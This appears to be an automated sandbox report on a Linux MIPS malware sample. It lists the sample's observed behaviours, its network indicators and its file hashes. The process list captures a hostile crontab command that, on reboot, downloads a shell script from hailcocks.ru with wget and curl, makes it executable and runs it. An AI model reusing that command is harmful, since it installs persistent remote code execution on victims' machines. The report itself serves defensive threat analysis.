Analysis Overview
SHA256
5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb
Threat Level: Shows suspicious behavior
The file 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:24
Reported
2024-10-27 02:27
Platform
debian9-mipsbe-20240611-en
Max time kernel
143s
Max time network
140s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 70.34.254.19 | N/A | N/A |
| Destination IP | 185.181.61.24 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.dQCYhx | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/mounts | /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf | N/A |
Processes
/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
[/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| PL | 70.34.254.19:53 | kingstonwikkerink.dyn | udp |
| NO | 185.181.61.24:53 | kingstonwikkerink.dyn | udp |
| NO | 81.29.149.178:22394 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.dQCYhx
| MD5 | f3ce9d7a4a91e5fd83d71554c65e28dd |
| SHA1 | 92f5357290d7c8b4d7f31552e22f6c0c7b2c1248 |
| SHA256 | 31a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf |
| SHA512 | 11e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0 |